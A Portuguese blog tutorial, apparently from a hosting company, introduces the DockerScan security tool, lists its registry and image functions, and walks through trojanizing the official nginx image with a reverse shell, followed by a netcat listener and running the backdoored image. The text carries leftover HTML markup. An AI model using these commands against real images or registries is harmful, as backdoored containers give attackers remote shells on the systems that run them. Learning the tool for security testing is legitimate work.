- \n
- Faz scan de uma rede tentando localizar os Docker Registries<\/strong><\/strong><\/li>\n
- Registry<\/strong>
> Delete: Exclui image \/ tag remota
> Info: Mostra informa\u00e7\u00f5es de registros remotos
> Push: Envia uma imagem
> Upload: Upload de arquivo<\/li>\n- Image<\/strong>
> Analyze
Busca por informa\u00e7\u00f5es confidenciais em uma imagem
Busca por senhas em vari\u00e1veis de ambiente
Busca por qualquer URL \/ IP em vari\u00e1veis de ambiente
Tenta identificar o usu\u00e1rio usado para executar o software
> Extract: extrair uma imagem
> Info: Obt\u00e9m meta-informa\u00e7\u00e3o da imagem
> Modify:
entrypoint: altere o ponto de entrada em um Docker
trojanize: injeta um reverse shell em uma imagem Docker
user: altere o usu\u00e1rio em execu\u00e7\u00e3o em uma imagem Docker<\/li>\n<\/ul>\nInstalando o DockerScan<\/h2>\n
Vamos ver agora como \u00e9 simples instalar<\/strong> a ferramenta DockerScan<\/strong>.<\/p>\n
Primeiro instale o gerenciador de pacotes da linguagem Python o pip:
1<\/code>$ python3.<\/code>5<\/code>-<\/code>m pip install <\/code>-<\/code>U pip<\/code><\/p>\nAgora instalamos o DockerScan
1<\/code>$ python3.<\/code>5<\/code>-<\/code>m pip install dockerscan<\/code><\/p>\nVerifique se a instala\u00e7\u00e3o foi feita corretamente e exiba as op\u00e7\u00f5es de funcionamento:
1<\/code>$ dockerscan -h<\/code><\/p>\nExemplos de utiliza\u00e7\u00e3o<\/h2>\n
Agora vamos para a parte legal, por a m\u00e3o na massa, vamos ver alguns exemplos<\/strong> de como o DockerScan pode ser utilizado:<\/p>\n
![\"dockerscan\"](\"https:\/\/cdn-cms.king.host\/blog-hlg\/uploads\/2018\/02\/0_qxqvxwsyetsfjt8i_.gif\" "\\"\\"")
<\/p>\nCom o comando a baixo pode ser escaneada uma imagem para identificar poss\u00edveis vulnerabilidades:<\/p>\n
1<\/code>$ dockerscan image info nome-da-imagem<\/code><\/p>\nSeguindos os passos abaixo podemos injetar vulnerabilidade em uma imagem Docker. Vamos adicionar um reverse shell neste exemplo:<\/p>\n
\/\/Baixe a imagem oficial do nginx\n$ docker pull nginx\n\n\/\/Salve uma c\u00f3pia da imagem\n$ docker save nginx -o nginx-original\n\n\/\/Liste o conte\u00fado do diret\u00f3rio para ver se foi criada a c\u00f3pia\n$ ls -lh nginx-original\n\n\/\/Execute o seguinte comando para ver as informa\u00e7\u00f5es da imagem\n$ dockerscan image info nginx-original\n\n\/\/Execute um ifconfig para saber seu ip\n$ ifconfig\n\n\/\/Execute para injetar um reverser shell\n$ dockerscan image modify trojanize nginx-original -l 172.18.0.1 -p 2222 -o nginx-trojanized\n\/\/Com este comando ser\u00e1 criada uma nova imagem com um reverse shell\n\n\/\/Execute em outro terminal para ficar \"ouvindo\" a porta 2222\n$ nc -v -k -l 2222\n\n\/\/Fa\u00e7a o load da imagem com vulnerabilidade\n$ docker load -i nginx-trojanized.tar\n\n\/\/Execute\n$ docker run nginx:latest<\/pre>\n
Um reverse shell \u00e9 um tipo de shell no qual a m\u00e1quina alvo se comunica de volta \u00e0 m\u00e1quina atacante. A m\u00e1quina atacante tem uma porta ouvinte na qual ele recebe a conex\u00e3o, que ao usar, o c\u00f3digo ou a execu\u00e7\u00e3o do comando s\u00e3o alcan\u00e7ados.<\/p>\n
Isso \u00e9 tudo por enquanto, no reposit\u00f3rio do projeto<\/a> DockerScan pode ser encontrada mais informa\u00e7\u00f5es sobre esta ferramenta, se voc\u00ea conhece outras dicas, ferramentas, ficou com alguma d\u00favida ou tem algo a contribuir, deixe um coment\u00e1rio abaixo. Obrigado pela leitura.<\/p>\n
- Registry<\/strong>